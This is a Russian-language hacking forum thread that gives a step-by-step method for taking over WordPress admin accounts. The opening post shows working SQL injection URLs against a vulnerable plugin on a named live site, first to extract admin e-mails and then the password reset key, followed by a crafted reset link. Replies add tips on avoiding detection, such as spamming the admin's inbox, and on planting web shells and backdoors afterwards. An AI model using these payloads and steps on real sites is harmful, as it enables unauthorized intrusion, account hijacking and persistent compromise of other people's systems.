Получаем доступ в админку Wordpress без расшифровки хэша

Тема в разделе "Статьи", создана пользователем nem1s, 7 ноя 2012.

  1. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    44
    Приветствую. Решил написать небольшую заметку.
    Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора.
    Но я понял как входить в панель без ожидания расшифровки хэша.

    Покажу на примере.
    У нас есть блог, где мы уже вывели данные из таблицы wp_users.
    Торопится выводить пароль не стоит, выведем e-mail администратора:

    Код:
    http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--
    И результат запроса:

    Так. Теперь идем на страницу авторизации wp-login.php, и переходим на страницу восстановления пароля (В нашем случае Passwort vergessen).

    Вводим e-mail администратора который мы получили выше, и отправляем письмо.

    Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД.
    Делаем такой запрос:

    Код:
    http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--
    И в результате мы получаем активационный код:


    Теперь идем на страницу сброса пароля (При этом заполнив параметры):

    Код:
    www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=admin
    И мы видим что нам предлагают ввести новый пароль, вводим, и меняем.

    Далее привычная авторизация.

    Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail().

    (с) n3m1s
     
    7 ноя 2012
    3 пользователям это понравилось.
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    Получится при условии что будет установлен hd-webplayer, либо какой то другой плагин с SQL injection, хотя, админов которые не следят за обновлениями достаточно много)
     
    7 ноя 2012
  3. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    44
    Нет. Если ты любым способом получишь данные из таблицы wp_users, то способ прокатит.
    Просто это первый попавшийся бажный блог.
     
    7 ноя 2012
  4. Hostgame
    Hostgame Новичок
    Симпатии:
    8
    Получится не на всех версиях ВП. Ибо в ранних (а мож наоборот в последних) новый пароль задается не пользователем, а генерируется и высылается на почту самостоятельно.
     
    20 ноя 2012
  5. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    44
    На самой новой (3.4.2) этот способ работает, сам вчера пользовался.
     
    20 ноя 2012
  6. FanOfGun
    FanOfGun Продвинутый
    Симпатии:
    14
    Имхо немного паливно, админ получает сообщение о смене пароля. Лично я бы проследовал на свой блог и проверил что да как...
     
    3 дек 2012
  7. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    а ты что, сутками почту мониторишь?
     
    3 дек 2012
  8. FanOfGun
    FanOfGun Продвинутый
    Симпатии:
    14
    Не поверите... Все время, пока включен комп(а он включен весь день) в фоне работает почтовик. Хотя да, таких не очень много.
     
    4 дек 2012
  9. corec
    corec Новичок
    Симпатии:
    4
    Почту админа можно проспамить, чтобы не увидел письма про пароль.
     
    4 дек 2012
  10. nem1s
    nem1s rm -rf /* Продвинутый
    Симпатии:
    44
    Некоторые администраторы юзают специальные почтовые программы, а значит сообщение о смене пароля они получают моментально. Так что нужно действовать быстро.
     
    4 дек 2012
  11. Mei
    Mei Guest
    Самые обычные. Не больше двух минут - и уведомление о письме в моем телефоне
     
    4 дек 2012
  12. A-L-I-E-N
    A-L-I-E-N Новичок
    Симпатии:
    5
    Этого будет вполне достаточно, чтобы сменить пароль, залить шелл, найти пароль от БД, подключиться к БД, и вернуть хеш пароля на изначальный. Ну а потом накопировать шеллов различных по папкам, бекдоры записать по файликам и пароли от БД наскриншотить по субдоменам %)
    Успешно проверено. Но уже встречал админки, которые при восстановлении пароля, не разрешают вводить новый пароль. А отсылают на почту его. Если правильно помню =)
     
    Последнее редактирование: 29 июл 2015
    26 апр 2014
Загрузка...